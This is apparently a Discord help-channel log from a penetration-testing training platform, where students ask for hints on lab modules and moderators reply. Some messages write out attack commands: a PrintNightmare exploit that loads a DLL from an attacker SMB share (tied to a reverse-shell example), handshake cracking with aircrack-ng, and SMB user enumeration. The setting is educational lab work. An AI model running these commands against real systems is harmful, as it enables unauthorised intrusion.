#modules

1 messages · Page 467 of 1

novel matrix
#

No exam cant add material that wasnt in the course shit

leaden island
#

bro is advertising

cyan veldt
#

So its fine if I skipped the ASM module

novel matrix
sour snow
#

When using impacket-smbserver to capture hashes, the credentials are only shown when the -debug flag is enabled. Without -debug, nothing is displayed. I’m using Impacket version 0.13.0.dev. Is it normal?

brave field
brisk thicket
#

Hello folks

#

Quick question...does recurly accept virtual credits cards?

#

I'm using a card that's working on most platforms but not HTB 🙁

signal chasm
#

FIlter line by line, ok, but what am I searching? I dont understand that. Regarding the other question: I am connected to the target and I dont know how that helps me

random vortex
#

i think it's good to get into AI hacking, we'll be reliant soon

signal chasm
#

can someone help me with tome connection issues? I cannot connect to deb.parot.sh. If i want to install nfs-kernel-server, i get a connection error "cannot initiate connection to deb.parot. same happens when i normally try to do sudo apt update

bright quiver
#

Like it’s cool to me if you already know your stuff but if you start from ai and try to proceed from there I don’t think that’s good. As a supplement to one’s own knowledge I think is better for an individual

vague lintel
#

Makes me think of having to rely on a car mechanic to get my car fixed when I can't fix something. It's great there are mechanics, but it comes at a cost.

random vortex
#

people will wish trhey started learning earlier when ut was around

junior helm
#

Sorry if I bother yoy guys, but I think this is the place to post. I follow the solution, but the RDP machine doesn't have this tool. And because the machine doesn't connect to internet, so I can't install it.
It's DNS Spoofing section, in Wi-Fi Evil Twin Attacks module.

obsidian oriole
#

Isn't it too early for a newbie (me) to do labs like this? I just can't understand how I was supposed to know which server is used for a service that requires a large amount of data.

brisk thicket
tranquil axle
fathom pendant
sturdy surge
#

did anyone do the "Online PIN Brute-Forcing Using Reaver"? beacuse ive been staring at reaver now for 4hrs and no results.

covert schooner
#

How do i solve this question of SNMP footprinting module?

#

Any nudges?

misty thorn
covert schooner
#

i am using snmpwalk

misty thorn
#

did you got an output?

covert schooner
#

got the email and custom version but not able to figure out this one

#

Got it thanks. Aborted it beforehand

misty thorn
#

no problem .

tranquil axle
merry crown
#

Hey someone to help with WiFi password access

grizzled schooner
#

I'm having quite the struggle with Citrix Breakout I don't understand what I'm supposed to do I guess...? I don't understand how to get the windows session to begin with... Anyone have a second to lend a hand? Please @ with responses

sturdy surge
spring viper
#

has anyone solved the ElasticNet Challenge for the AI Evasion - Sparsity attacks module. My L2 is off by 0.1 and I am having trouble finding the right tunes to get it down

silent wolf
#

Any tips for rdesktop or xfreerdp to increase response times? I have a module that I can not complete because of the response times. I have reset the box, and tried both rdp tools. It is not a connectivity issue from client-to-site VPN.

silk ore
fathom pendant
#

@silk ore module is above tier 0; please don't share module content

fathom pendant
silk ore
silent wolf
tranquil axle
fathom pendant
silent wolf
silent wolf
#

A second reset of the target was the trick. I despise losing time. But, it is trials from which I learn the most.

short osprey
#

I'm completing the Network Packet Analysis > Wireshark module.
One of the questions is What is the name of the screen section in Wireshark where we can view the payload information of captured packets in both ASCII and Hex format?

I've entered every version of Packet bytes, and Data bytes, including appending 'pane', changing case etc. no dice.

Any ideas where I'm going wrong?

limber surge
#

Anyone give me a nudge on the first question in the "Credential Hunting" section of Windows Privilege Escalation?

junior helm
#

Does anyone finish this question successfully? I tried multiple times with solutions but failed all the time

#

I get handshake then stop, and run ||sudo aircrack-ng /root/bettercap-wifi-handshakes.pcap -w /opt/rockyou.txt||

#

@tribal plinth Are you the author of Bettercap lab? 😄 Can I dm you?

iron cipher
#

Hey, i am on the using crackmapexec assessment and I am on the 3rd question i got James password and i have no clue, where to go, i tried looking through smb, ldap, winrm amd no results. I am sorta stuck right now, can someone dm if they can assist.

tranquil axle
#

Did you check gmsa?

fathom pendant
dusk forum
#

To anyone that has finished (or almost finished) in the AI Red Teamer job role path, I was wondering whether the "skills assessments" on some of the modules (particularly the hard ones like AI Evasion) there is good enough to be put in a resume looking for an internship / junior (security or not) AI/ML roles? Or are they too basic

-# provided that I know its still guided, but I was just wondering

iron cipher
twilit sparrow
#

Hello, I need some help with the Attacking Authentication Mechanisms Skills Assessment:|| I tried to inject a new JWK with the python script and I'm not being able, I tried other tools such as jwt_tool but unsuccesful||. Could someone please give me a hint? Thanks!

halcyon flume
#

In SQLMap Essentials module Skills Assessment, what's the difference between using {"id":1}, {"id":1*}, and {"id":*} in the HTTP request file?

desert widget
#

can someone help me in the login brute forcing module, I am stuck in the custom wordlist section

#

i dont know what user name we need to login with

#

can someone help me with that

hybrid kraken
#

Does anybody know what could be the problem here?

Command:
proxychains netexec smb TARGET_IP -u 'USER' -p 'PASSWORD' -d DOMAIN -M spooler

RESULT:
Spooler service enabled

Command:
proxychains rpcdump.py @TARGET_IP | egrep 'MS-RPRN|MS-PAR'

RESULT:
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

Command:
proxychains nxc smb TARGET_IP -u 'USER' -p 'PASSWORD' -d DOMAIN -M printnightmare

RESULT:
Vulnerable, next step https://github.com/ly4k/PrintNightmare

Command:
proxychains ./printnightmare.py -check USER:'PASSWORD'@TARGET_IP

RESULT:
[*] Target appears to be vulnerable!

Command:
proxychains ./printnightmare.py -dll '\IP_OF_WIN_HOST\smb\test.dll' -name 'My Printer Driver' USER:'PASSWORD'@TARGET_IP

RESULT:
[] Enumerating printer drivers
[
] Driver name: 'My Printer Driver'
[] Driver path: 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ec1e73781eaf7fda\Amd64\UNIDRV.DLL'
[
] DLL path: '\\IP_OF_WIN_HOST\smb\test.dll'
[*] Copying over DLL
Traceback (most recent call last):
<SNIP>
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

test.dll
-> https://notes.justin-p.me/guides/printnightmare/#custom-simple-c-reverse-shell-example

woven zenith
#

I need a nudge for Whitelist Filters . I can upload the payload but when I execute them its 404. I tried various file patterns, non is working so far.

#

solution is not working also.

brave field
woven zenith
#

I get that, tbh they should be in the solution.

brave field
shut wraith
#

Hello

#

If I am using NXC to spray should I use the LDAP protocol or SMB ?

visual crag
shut wraith
brave field
sour snow
#

Can someone help me understand why, in an HTB lab machine, the port always changes to filtered after a few minutes?
At first, the port looks normal and shows as open, but after a short time it switches to filtered. I’ve tried many times, but once this happens I can’t do anything. Module Pivoting, Tunneling, and Port Forwarding at Remote/Reverse Port Forwarding with SSH section.

gray yacht
brave field
sour snow
gray yacht
brave field
# shut wraith

nxc smb 10.129.137.178 -u '' -p '' --users --users-export $(pwd)/users.txt

twilit sparrow
#

Hello, I need some help with the Attacking Authentication Mechanisms Skills Assessment:|| I tried to inject a new JWK with the python script and adding the line expç and I'm not being able, I tried other tools such as jwt_tool but unsuccesful||
. Could someone please give me a hint? Thanks!

prime magnet
#

help with "Open VPN" I can't connect

frigid bolt
prime magnet
#
┌──(kali㉿Bob)-[~]
└─$ ping -c 5 10.129.236.99 
PING 10.129.236.99 (10.129.236.99) 56(84) bytes of data.

--- 10.129.236.99 ping statistics ---
5 packets transmitted, 0 received, 100% packet loss, time 4099ms
prime magnet
#

I tried to many Targets and downloads to many vpns and still no connection

frigid bolt
# prime magnet ``` ┌──(kali㉿Bob)-[~] └─$ ping -c 5 10.129.236.99 PING 10.129.236.99 (10.129.23...

I don’t understand why it doesn’t work there is the completed initialization sequence so it should work .... , look :

https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access

https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

prime magnet
#

Thank you !

hasty mauve
#

Module: ADCS Attacks
Section: Using BloodHound with Certipy
Question: Certipy doesn't have the -bloodhound flag, and it no longer exports a bloodhound .zip data from what I remember, is using certipy with bloodhound still being updated or is that feature deprecated?

hasty mauve
#

Module: ADCS Attacks
Section: Skills Assessment
Question: Compromise DC01 and submit the value of the flag file at C:\Users\Administrator\Desktop\flag.txt

The user I found that starts with j is part of a group called src_management, which has ManageCertificates rights.
Though when I try to issue the certificate with certipy, it gives me access denied.

safe star
#

Or you mean denied in a way you don’t even get the key save option

vague lintel
hasty mauve
#

The request is pending.

#

The issue is I get access denied when trying to approve it

#

which is supposed to work according to what I understood from ESC7 section.

safe star
vague lintel
#

are they allowed to post the template here ?

dull sinew
#

Hi, I'm stuck on question 3 of the NTLM Relay "skill Assessment". Any hint?, I've gained administrator access to backup01$ but I don't know how to proceed.

opaque copper
#

anyone experiencing issues with htb academy machines ??

mint lodge
#

Hey All,
I'm doing the CPTS path, Pivoting, Tunneling, and Port Forwarding module, at the RDP and SOCKS Tunneling with SocksOverRDP section. When I do the following command on the first host" regsvr32.exe SocksOverRDP-Plugin.dll I am getting an error instead of the success msg. I am following the exact instructions from the module so Idk what to do.

#

Am I just better off perfecting Chisel and Ligolo and using only both in the exam? These tools seem really meh tbh

candid bough
uncut slate
#

Something appears to be wrong with the ACADEMY-INCIDENT-HIVE.

opaque copper
spring viper
#

does any1 know the quality of the academy solutions?

#

is it just an answer or is it a full on walkthrough with explanations, etc. Thinking about buying a subscription but want to be sure

hollow bolt
#

Guys in the pivoting module, is this correct ? proxychains works with TCP packets (layer 4) but nmap -sn sends ICMP packets (layer 3) which proxychains doesn't understand. Am i missing something ?

uncut slate
#

MadhukarRaina doesn't seem to be on discord

Did you complete module 148 @supple gorge

opaque copper
#

any help with this ???? :

fathom pendant
opaque copper
#

oh yes I can

#

that's weird

opaque copper
fathom pendant
opaque copper
#

I see , something to add to my knowledge !! thank you

tawny veldt
#

dm if you still need help

coarse pine
fathom pendant
#

about?

coarse pine
#

you are not going to be angry?

#

it is about osTicket

#

in the help center they say the credentials in the section but I can't find it

#

oh shit... what is that

#

scary

tawny veldt
fathom pendant
#

it's provided, maybe not directly as user:pass

#

but it IS provided

coarse pine
#

oh thanks

#

can I ask a other question 🥺

#

like I used all the passwords

#

also they said that the password from the tool are not going to work

fathom pendant
#

did you use all the username and password combinations for logging in? :)

#

also there's a specific login page (for employees)

coarse pine
#

sorry my english is not good but I think it mean

#

this is not real

fathom pendant
coarse pine
fathom pendant
#

they just mean that the sample data isn't out there in the real world

coarse pine
#

like is it kevin right?

#

his email

fathom pendant
#

i don't recall fully

#

all i will tell you is try everything

coarse pine
#

there is a limit that is annoying

fathom pendant
#

just log in via the web portal... not sure what you mean by limit

coarse pine
#

what is web portal?

fathom pendant
#

a web portal being how you interact with the service, via the web

coarse pine
#

please Marcielee my wisdom tooth is growing that hurt!!!!

coarse pine
#

there is a limit

#

"message": "Maximum failed login attempts reached",

fathom pendant
#

that sounds like you're using a fuzzing tool

#

and NOT the web portal

coarse pine
#

no

#

not using fuzzing

fathom pendant
#

anyway visit the login page; use the credentials

coarse pine
#

I am in the normal agent login

fathom pendant
#

if it limits you then reset the lab

#

change the ip in your hosts file

#

and retry

coarse pine
fathom pendant
coarse pine
#

finally

fathom pendant
coarse pine
#

I can just find your mom, they said there is somthing else

#

I don't mean your mom

#

I mean the ticket

#

name

#

sorry

#

I think there is a way to see the old tickets

fathom pendant
#

there is, now go

#

utilize your brain (and google) to see if you can't figure out how to search up tickets

coarse pine
#

I found it

#

that makes me want to buy Dehashed

fathom pendant
coarse pine
#

hmmm

#

maybe I need it for something else then

#

sorry HTB

#

but I can't promise you I will that I will use my power for the good things

fathom pendant
#

don't imply doing illegal things if you wish to remain in the server :)

acoustic owl
coarse pine
#

hey I was just joking!

#

sorry

fathom pendant
coarse pine
#

like

#

I am not a gun

fathom pendant
#

we have no way of knowing if you're serious or not

#

it's also called an analogy

#

if you're unable to abstract analogies then idk what to tell you

coarse pine
#

sorry

#

I will try my best

acoustic owl
#

Anything you write anywhere on the internet can be found and used by authorities...

coarse pine
#

oh shit

#

am I targted now?

#

I should said that from my Raspberry PI!!!!!

#

it is easier to destroy

acoustic owl
coarse pine
#

I don't want my mom to see in in the TV as a bad person

#

🙁

acoustic owl
#

My tip: never talk about any illegal activities you are planning. Whether it's because you want to carry them out or even if they are meant as a joke.

coarse pine
#

okay can I ask you something please?

#

is there people who knows about my things I put in the cloud?

#

like if I put something in google drive

#

can they see it?

acoustic owl
coarse pine
#

OOHHH SHIHIHITTTTT

#

IM COOOCKCKEDDD

#

but how I am not in the jail right now

tired bough
#

privacy policy most likely

#

cloud providers like backblaze cant just look at your files without cause

#

OSINT Corporate Recon the cloud storage part im sorta stuck.

the question askes: Investigate the website and find the bucket name of AWS that the company used and submit it as the answer. (Format: sub.domain.tld)

im assuming its talking about inlanefreight.com. so started looking at the source code for exposed buckets, but i cant find anything at all. searchcode which is used lots in this module is no longer a functioning website. i guess they are rebooting searchcode but in the meantime is there an alternative?

#

but any pointers? i even ran it through spiderfoot to see and only thing i can find that would point me in the right direction is the PDF download file, but that file is just in the wordpress uploads dir

tired bough
#

anyone?

acoustic owl
coarse pine
#

aaaa

#

I am doing CTF but my laptop is shit and I need to crack a hash

coarse pine
#

I am still not able

ocean night
#

What CTF?

coarse pine
#

because there is already writeups for it

#

I don't know dude

ocean night
#

Which one?

coarse pine
ocean night
#

Then go ask for help in THM

#

This is for HTB Academy modules

coarse pine
#

I see people asking for help in general

waxen totem
#

this ain't THM bro... we can't help you with anything outside HTB platform

waxen totem
coarse pine
#

I can give you the CTF and you will find the same hash

#

oh

tired bough
tired bough
#

if you are doing a CTF that is not hack the box most of the time the hashes are in popular wordlists, try weakpass4 or rockyou or seclists

#

unless your bruteforceing

#

and yeah this is hack the box not try hack me dude lol

iron cipher
#

I am on the last question of using crackmap exec skill assessment i got the .ccache I have exported however i can’t dump shares, i can’t dump users or anything. I tried using secret dump.py to get an administrator hash however no dice sorta confused

iron cipher
#

Well lately it is asking for a password which it shouldn’t do other times it asks for the use-vss and when i use the vss parma it is blocked or it will say try just-dc-user and that didn’t get anything it will also say socket error or time out

iron cipher
#

Yea

cyan veldt
#

what am I suppose to do??

#

is there a flag that doesnt mind http

waxen totem
modest token
#

Stuck on Abusing HTTP Misconfigurations - Hard assessment.
Successfully poisoned the cache (||parameter ||||cloaking||) for the exact admin-monitored URL in the red note ("please access this site frequently via this link").
Payload breaks out cleanly and executes instantly on clean URL load (cache HIT).
Tried XHR (with/without custom headers), fetch, and even location redirect – all fire in my session, but nothing happens backend-side despite the note saying admins monitor frequently.
Waited way past TTL, multiple lab resets, careful timing – no change.
Is the admin bot currently broken/not triggering?

tranquil axle
hasty mauve
#

Module: Active Directory Trust Attacks
Section: Mapping Active Directory Trusts

When I try to launch Adalanche with .\Adalanche.exe analyze it gives me an access denied error

Problem launching webservice listener: listen tcp 127.0.0.1:8080: bind: An attempt was made to access a socket in a way forbidden by its access permissions.
#

The exercise is optional so for now I just typed DONE and will move on.
But this probably should get fixed.

open violet
#
  • AI Defense
  • Skills Assessment
  • Struggle getting tokens
  • I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand? Please mention so I get the notification, thanks in advance 🙂

twilit sparrow
#

Hello! Does anyone finish the module Introduction to NoSQL injection? I'm trying to solve the skills assessment II and I need a hint! thanks in advance

vapid maple
#

is there anyone online that is fairly knowledgeable about how the HTB vpn works? I cant access my homelab network (192.168.10.0/24) after establishing a vpn connection

vapid maple
#

I can connect to the vpn and it works fine. I just cant use any of my local resources while on the vpn

gray yacht
vapid maple
#

it seems all the traffic is using the tun0 interface, is it not setup to be a split tunnel?

vapid maple
#

ah it has the redirect-gateway to force all traffic to the tun0 interface

proud yacht
#

Could I get a nudge on the LFI Skills Assessment?
||Found what could be the vulnerable parameter, however, it spits out verbatim my input without executing anything. Fuzzing/dirbusting doesnt find anymore directories or parameters to mess with.
Tried tampering with some things in the request with burp but not getting anything back
I see I can upload a file as docx but not seeing a way to access it. Also no PHPSESSID cookie||

modest token
# tranquil axle I noted down “ensure we close first script tag so the undefined function doesnt ...

Thanks – yes, I closed the original script tag with </script>, and the injected <script> runs perfectly (XHR fires on cache HIT, no errors).
Payload is clean, poison sticks for the monitored URL, everything executes when I load it.
But no promotion happens even after resets and long waits.
I think the admin bot is bugged/not triggering right now.
I'm hoping that someone from support can check/fix it?

tranquil axle
#

If you want you can dm me your solution and I compare it to what I’ve written down

leaden island
#

yo guys im on attacking joomla in application attacks

#

i got RCE and got the flag, but question says incorrect

#

well, i was missing a ! character at the end of the flag Kappa

modest token
#

For the record, HTTP Misconfigurations - Skills Assessment - Hard cannot currently be solved until the admin bot has been fixed. I verified that my solution should work. Hopefully someone can take a look at this soon.

tidal jolt
#

Anyone seen this? I've tried a few times and get the same thing each time. I get my shell with netcat and then improve by spawning the python shell, and then every keystroke is doubled:

#

It still works like there's only one keystroke, but it's doubled to the screen.

#

Maybe I'll try respawning the target.

hidden ledge
#

It worked for me when this append

#

btw you should always do this to get a stable reverse shell and have history etc..

tidal jolt
#

Awesome, thank you!

grave marsh
#

does anyone know if the oracle TNS module within footprinting is wrong or can someone help me set up ODAT for the life of me i cannot get this flag because the odat is not working properly and i need it to get the flag

grave marsh
#

nooo guys don’t all help at once noo pls one at a time

#

but pretty much the main issue im having is i am running kali and odat.py needs python 3.11 but im running a newer version of python i think command i am trying to run is ./odat.py all -s <target_ip> but i keep getting a fat error message even tho i have gone on the odat github and followed the steps to install it! so annoying when you get stuck like this because it just becomes so unmotivating

olive depot
#

Anyone got problem connection with RDP? Using Pwnbox .

ocean night
olive depot
#

Weird, worked like a charm few hours ago ;p

ocean night
#

What's the problem in specific? Just.. can't connect?

olive depot
#

Getting no screen at all, it ask for password - enter it .. Keep loading then shuts down.

ocean night
#

Sorry to ask, but have you tried resetting the target?

olive depot
#

Twice 🙂

#

@ocean night well, used same syntax worked now lol

ocean night
#

dafuq

#

Uhhh.. Gremlins?

olive depot
#

Damn thats old! Must be ^^

vagrant pine
#

Looking for some help on the File Upload attacks: Type filters module. For the exercise I found an extension that uploads my php shell successfully as file.<extension>.jpg but when I navigate to that file in that browser I see the error: The image at url/profile_images/shell.<extension>.jpg cannot be displayed because it contains errors. Any ideas how to debug from here? I thought I had already got past all the file type filters.

fathom pendant
jovial walrus
#

On pass the ticket for linux i am unable to crack svc aes 256 hash

nova void
#

A single extra space at the start of the flag was the issue.

fallen wyvern
#

Hi everyone, first time trying to run kali Linux in a virtual box. Trying to download and run the VPN in the academy but my terminal basically just freezes up.

#

Kinda stuck on what to do, I would like to run the academy stuff on my own machine

median geode
#

If your window has the last lines 'Timers: xxx ' and 'Protocol options: xxx' then it's up and running, just start a new terminal tab as your vpn is connected.

fallen wyvern
#

2025-12-30 00:19:16 tun/tap device [tun0] opened
2025-12-30 00:19:16 net_iface_mtu_set: mtu 1500 for tun0
2025-12-30 00:19:16 net_iface_up: set tun0 up
2025-12-30 00:19:16 net_addr_v4_add: 10.10.14.73/23 dev tun0
2025-12-30 00:19:16 net_iface_mtu_set: mtu 1500 for tun0
2025-12-30 00:19:16 net_iface_up: set tun0 up
2025-12-30 00:19:16 net_addr_v6_add: dead:beef:2::1047/64 dev tun0
2025-12-30 00:19:16 net_route_v4_add: 10.10.10.0/23 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:19:16 net_route_v4_add: 10.129.0.0/16 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:19:16 add_route_ipv6(dead:beef::/64 -> dead:beef:2::1 metric -1) dev tun0
2025-12-30 00:19:16 net_route_v6_add: dead:beef::/64 via :: dev tun0 table 0 metric -1
2025-12-30 00:19:16 Initialization Sequence Completed
2025-12-30 00:19:16 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 44, compression: 'lzo'
2025-12-30 00:19:16 Timers: ping 10, ping-restart 120
2025-12-30 00:19:16 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt
^C2025-12-30 00:41:06 event_wait : Interrupted system call (fd=-1,code=4)
2025-12-30 00:41:06 SIGTERM received, sending exit notification to peer
2025-12-30 00:41:06 SENT CONTROL [us-academy-6]: 'EXIT' (status=1)
2025-12-30 00:41:07 net_route_v4_del: 10.10.10.0/23 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:41:07 net_route_v4_del: 10.129.0.0/16 via 10.10.14.1 dev [NULL] table 0 metric -1
2025-12-30 00:41:07 delete_route_ipv6(dead:beef::/64)
2025-12-30 00:41:07 net_route_v6_del: dead:beef::/64 via :: dev tun0 table 0 metric -1
2025-12-30 00:41:07 Closing tun/tap interface
2025-12-30 00:41:07 net_addr_v4_del: 10.10.14.73 dev tun0
2025-12-30 00:41:07 net_addr_v6_del: dead:beef:2::1047/64 dev tun0
2025-12-30 00:41:07 SIGTERM[soft,exit-with-notification] received, process exiting

#

This is part of the code the terminal spat out to me

#

I accidently ended it but I did not see the timers

ocean night
#

Exactly what blueasagi said.. your VPN connection was running, you just leave that tab open and use new tabs or whatever you need to interact with the targets.

fathom pendant
#

2025-12-30 00:19:16 Initialization Sequence Completed

fallen wyvern
#

It gives me these warnings at the top, not sure if it matters but not sure how to disable them either.

#

2025-12-30 00:19:14 DEPRECATED OPTION: --persist-key option ignored. Keys are now always persisted across restarts.
2025-12-30 00:19:14 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Compression support is deprecated and we recommend to disable it completely.
2025-12-30 00:19:14 Note: --data-ciphers-fallback with cipher 'AES-128-CBC' disables data channel offload.
2025-12-30 00:19:14 OpenVPN 2.7_rc4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-12-30 00:19:14 library versions: OpenSSL 3.5.4 30 Sep 2025, LZO 2.10

fathom pendant
#

those warnings are irrelevant

#

the only major important line is

Initialization Sequence Completed

#

after that you just open a new terminal and you should be good to go

fallen wyvern
#

Oh okay, thank you, then I should be getting the SSH login information from the bottom from the hack the box site correct?

fathom pendant
#

from the question section, yes

fallen wyvern
ocean night
fathom pendant
#

but that depends; not all modules will have you ssh in, some may require you to discover credentials (but that's all contextual from the reading)

#

or sometimes the credentials are in the reading, but not referenced in the question as a step-in

fallen wyvern
#

Understood, however I am now having an issue were I think I am putting the correct password below but maybe I did not format it correctly

#

ssh 10.129.187.55
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
kali@10.129.187.55's password:
Permission denied, please try again.

#

I attempted to follow it and use the provided password but maybe I am doing it wrong, made sure my caps lock was off and took my time

fathom pendant
#

ctrl+shift+v to paste in terminal

fallen wyvern
#

No I know what I did wrong now!

#

It was a silly mistake, I did not put the htb-student@ first

#

before the IP

fathom pendant
#

it reduces the amount of human error :)

fallen wyvern
#

Understood, thank you for that

fathom pendant
#

likewise ctrl+shift+c allows copying from the terminal

maiden zinc
#

Using the stack

past narwhal
#

Hello. I'm going through the "Android Application Static Analysis" module a.t.m. and I'm stuck on the "Reversing Hybrid Apps" section. After decompiling the app, I found the debug key needed to authenticate with the remote server, however for some reason my requests keep returning "Invalid credentials!". Not sure what I'm doing wrong. Anyone that wants to give me a nudge? I'll send you the request I'm using via pm.

trim sparrow
#

Hi, I'm on the course
Documentation & Reporting Practice Lab. I'm almost done, I'm on the AD machine. I got the first three questions right, but I can't figure out the fourth one. Here's the question: What powerful local group does this user belong to?

I looked in the JSON files and found some interesting things, but it's not working.

Can anyone help me?
I'm French and my English isn't very good.

worn sun
worn sun
proven fox
#

Can i DM you . I also stuck at Question3 of crackmapexec assessment.

boreal cliff
#

Could anyone help me with contacting the HTB support? Idk if here is the right place to ask, but I need it.

hoary swan
#

Anyone was able to complete the "Rogue Actions" module from "Attacking AI - Application and System"?

dusk holly
#

shells & Payloads module -> Infiltrating Windows, the module is pretty straight forward, exploiting EternetBlue vulnerability, the question i am stuck is this one
"Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:"
i confirmed it's vulnerable to EternelBlue, but when i actually try it with metasploit module "exploit(windows/smb/ms17_010_psexec"
i am getting this error shown in the picture, i am pretty sure everything should be okay, i tried different modules, and payloads but none worked, it would be great if any one give me a little nudge on this

covert fulcrum
#

Information Gathering - Web Edition Web Archives According to wikipedia.com snapshot taken on February 9, 2003, how many articles were they already working on in the English version? Answer with the number they state without any commas, e.g., 100000, not 100,000.
The Wayback Machine Work do not work , so i can t get the right number , can anyone help me?

hidden ledge
dusk holly
hidden ledge
#

And other port ?

#

Above 1024

dusk holly
#

it looks like it is error from my set up because i didn't see any one in the forums having this issue

dusk holly
#

it is working just fine with pwnbox

turbid pumice
dusk holly
gray yacht
dusk holly
worn sun
#

maybe try sudo ufw disable

#

before running msfconsole

gritty light
#

Introduction To Windbg > SA Q.1 (Tracefile Unqualified Symbol)

temp-fix: open the trace file on a local machine that has internet access

When I open the trace file and run dt ntdll!_PEB I or dt ntdll!_EPROCESS I get the following error. I tried using .symfix C:\Symbols to fix this error but it didn't work. I then used a local Windows machine, installed Windbg, and used that, given the local machine had internet access, it fixed the issue.

dt nt!_EPROCESS ************************************************************************* *** *** *** *** *** Either you specified an unqualified symbol, or your debugger *** *** doesn't have full symbol information. Unqualified symbol *** *** resolution is turned off by default. Please either specify a *** *** fully qualified symbol module!symbolname, or enable resolution *** *** of unqualified symbols by typing ".symopt- 100". Note that *** *** enabling unqualified symbol resolution with network symbol *** *** server shares in the symbol path may cause the debugger to *** *** appear to hang for long periods of time when an incorrect *** *** symbol name is typed or the network symbol server is down. *** *** *** *** For some commands to work properly, your symbol path *** *** must point to .pdb files that have full type information. *** *** *** *** Certain .pdb files (such as the public OS symbols) do not *** *** contain the required information. Contact the group that *** *** provided you with these symbols if you need this command to *** *** work. *** *** *** *** Type referenced: nt!_EPROCESS *** *** *** ************************************************************************* Symbol nt!_EPROCESS not found.

On local machine

<SNIP>
Loading Dump File [C:\Users\P1erce\LegitProgram01\LegitProgram01.run]
0:000> dt _PEB
ntdll!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
<SNIP>
lyric socket
#

Has anyone completed the Wi-Fi Penetration Testing Tools and Techniques module? The target machines seem to be missing APs that are mentioned in the questions

quartz raft
#

hii

#

anybody completed these??

novel valve
coarse pine
quartz raft
quartz raft
# coarse pine me

oh great actually is it of any use like just keeping on going without actually using it with any real time projects

#

because its too much of information

#

most arent needed for the actual cybersecuirity ig

fresh moth
#

any issue with this module? "Pivoting, Tunneling, and Port Forwarding
RDP and SOCKS Tunneling with SocksOverRDP"

#

did everything accordingly still cant connect to the second machine(the one with the flag)

fathom pendant
#

regex is super useful for refining searches

#

i.e. grep -e "^hello", grep -e "hello$", and grep -e "hello" all search differently

novel valve
coarse pine
crude wing
#

Modern Web Exploitation Techniques Skill Assessment

jovial walrus
#

the pass the cert section on password attacks seems kinda complicated to understand as compared to ptt and pth

thin flicker
thin flicker
jovial walrus
#

same errorrrrr pls help mee lel

jovial walrus
#

.

jovial walrus
#

spent three hours on this..

gray yacht
#

I'm assuming your hosts file is updated.

jovial walrus
#

ah i might have made a small error

gray yacht
jovial walrus
#

i misspelled inlanefreight in etc hosts

gray yacht
jovial walrus
#

yeah thx a lot just submitted both flags

#

I am always messing up the inlanefreight spelling by putting the 'i' first instead of the 'e'

gray yacht
reef osprey
pulsar prism
#

I stepped away to work on other projects for a bit is it possible to reset a module I am in the middle of or completed awhile ago?

jovial walrus
#

is it possible to do password attacks skills assessment without knowing about pivoting ?

gray yacht
fathom pendant
jovial walrus
fathom pendant
#

Also its above tier 0. So writeups are prohibited

jovial walrus
fathom pendant
jovial walrus
fathom pendant
trim rain
#

I am redoing some old exercises from the modules I finished long ago. Is it normal not to be able to connect to the target machine anymore after the module is complete?

fathom pendant
#

Its still prohibited and against ToS

fathom pendant
#

At least info-wise

junior helm
#

Anyone finish EAP Downgrade Attack (Attacking) question? I need help prayge

limber surge
#

hey, for the windows prpvilege escalation under the lviing off the land binaries and scripts. can someone nudge me in the right direction? i tried the approach given in the module but i failed to do so.

sing the techniques in this section, find the cleartext password for an account on the target host.

long flint
#

hi guys, i need a bit of help on Intro To Assembly Language. The question is Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?

when i download the gdb file, i run it with the script they gave and then inside of GEF i run starti (i couldnt find _start and chatgpt said to try this instead)

i get the following output:
0x7ffff7fe4b20 <_start+0000> mov rdi, rsp
0x7ffff7fe4b23 <_start+0003> call 0x7ffff7fe5720 <_dl_start>
0x7ffff7fe4b28 <_dl_start_user+0000> mov r12, rax
0x7ffff7fe4b2b <_dl_start_user+0003> mov rdx, QWORD PTR [rsp]
0x7ffff7fe4b2f <_dl_start_user+0007> mov rsi, rdx
0x7ffff7fe4b32 <_dl_start_user+000a> mov r13, rsp

i dont see _start+16 anywhere, and i'm a bit lost

#

then afterwards, the file also deletes itself

#

not sure if im supposed to put the gdb file itself in a debugger, or im supposed to be in another file?

#

nvm could answer it if i dont use the htb provided script with gef..

past narwhal
random vortex
#

u accessing an ip from internal?

#

if so use ligolo for all pivot

#

it's smoother

#

and less heavy on your network itself

#

keeps a stable pivot for you

#

and also dm me i can try help you

coarse pine
dusk holly
coarse pine
#

okay

#

Plese I did not open wirshark in my life HEEELELPPPPPPPPPPPPPPPPPPPPP

#

HHELEELPPPPPPPP MEEEEEEEE

dusk holly
coarse pine
dusk holly
coarse pine
#

and what inside tha packets?

dusk holly
coarse pine
#

this is not fair at allll

dusk holly
#

go through fundamental modules then

coarse pine
#

should I do all the fundamentals? I did 27%

dusk holly
coarse pine
#

what

#

I am n00b

dusk holly
#

yeah, do all of them

#

all of those fundamental modules

#

also search internet on pentesting mindset

coarse pine
dusk holly
coarse pine
random vortex
#

need help with prolabs, the machine is dead when i restart the lab environment it still isnt responsive

#

on dante

mint topaz
#

these are explaining the same thing

#

